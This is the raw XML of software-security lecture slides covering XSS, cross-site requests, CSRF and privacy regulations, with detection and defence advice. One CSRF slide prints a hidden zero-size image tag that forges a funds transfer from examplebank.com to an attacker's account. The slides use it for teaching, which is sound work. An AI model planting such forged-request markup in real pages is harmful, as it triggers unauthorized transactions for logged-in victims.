              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://excess-xss.com/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="160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0"/>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Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p60"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Combination of manual code review/pen testing and automated tools.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need be interpreter specific: Javascript, ActiveX, Flash, Silverlight etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Properly escape and validate all untrusted data based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enable CSP (Content Security Policy)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4175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 sz="2400"/>
              <a:t>Cross-Site Requests and Its Problems</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="371" name="Google Shape;371;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1170125"/>
            <a:ext cx="4514125" cy="3028551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4742400" y="990225"/>
            <a:ext cx="4089900" cy="3954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When a page from a website sends an HTTP request back to the website, it is called same-site request.</a:t>
            </a:r>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If a request is sent to a different website, it is called cross-site request because the where the page comes from and where the request goes are different.</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Eg : A webpage (not Facebook) can include a Facebook link, so when users click on the link, HTTP request is sent to Facebook.</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61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="4198675"/>
            <a:ext cx="44337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It is possible for third-party websites to forge requests that are exactly the same as the same-site requests. This is called Cross-Site Request Forgery (CSRF).</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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379" name="Google Shape;379;p62"/>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Attacker tricks a logged-on victim’s browser to send a forged HTTP requests that include the victim’s session cookie or other authentication info to a vulnerable web application, which thinks the request is legitimate from the victim.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The victim logged into the vulnerable site (e.g. examplebank.com) and got authenticated</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Victim then visits the attacker site, and clicked on a image with the following iframe embedded:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;img  src="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://examplebank.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>&amp;destinationAcct=attackersAcct#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>" width=0 height=0/&gt;</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Privacy </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Google Shape;85;p18"/>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Related to confidentiality (but not exactly the same)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mostly associated with the right to control one’s own personal information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proper handling of personal data</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Notice, consent</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Privacy Regulations:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GDPR (General Data Protection Regulation)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HIPPA (Health Insurance Portability and Accountability)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GLBA (Gramm-Leach-Biley Act)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>CCPA (California Consumer Privacy Act)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Family Educational Rights and Privacy Act (FERPA)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="160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Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p63"/>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Detection:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Both manual and automatic methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Focus on the links and forms that invoke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t> state-changin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>g functions. Check if they lack of unpredictable CSRF tokens.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Defense:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Include an unpredictable unique token (per user session) in each HTTP request. This unique token is preferably included in a hidden field. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require the user to reauthenticate, or prove they are a user (e.g., via a CAPTCHA) can also protect against CSRF.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="16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391" name="Google Shape;391;p64"/>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is Built in, not Add on</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p19"/>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Software are everywhere. More software (code), more bugs, more attacks.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Most software developers don’t know enough about security and most security engineering don’t know much about software development. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>GitLab Survey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>Software security is still in its infancy</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>You cannot just add security around the software, you have to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>Build Security into the Software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>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Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Google Shape;97;p20"/>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Software security is an idea implemented to protect software against malicious attack and other hacker risks so that the software continues to function correctly under such potential risks. (www.techopedia.com)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Perimeter defense is not enough:</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Firewall (App Vetting)</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Penetration testing</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Security built into the software</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2000"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>understanding, preventing, and mitigating software-induced security risks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Security vs Application Security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;103;p21"/>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many types of software: OS, VM, Compiler, Browser, Database, plug-in, framework, etc</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>No program is an island. Attackers may exploit bugs/flags in any software. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>It is a system-wide issue, need both security mechanisms (such as access control) and design for security.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251200" y="172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Security is Everyone’s job</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="835687"/>
            <a:ext cx="8520600" cy="373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Builders</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Operation people</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Administrators</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Executives</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;110;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="935250" y="4095425"/>
            <a:ext cx="68340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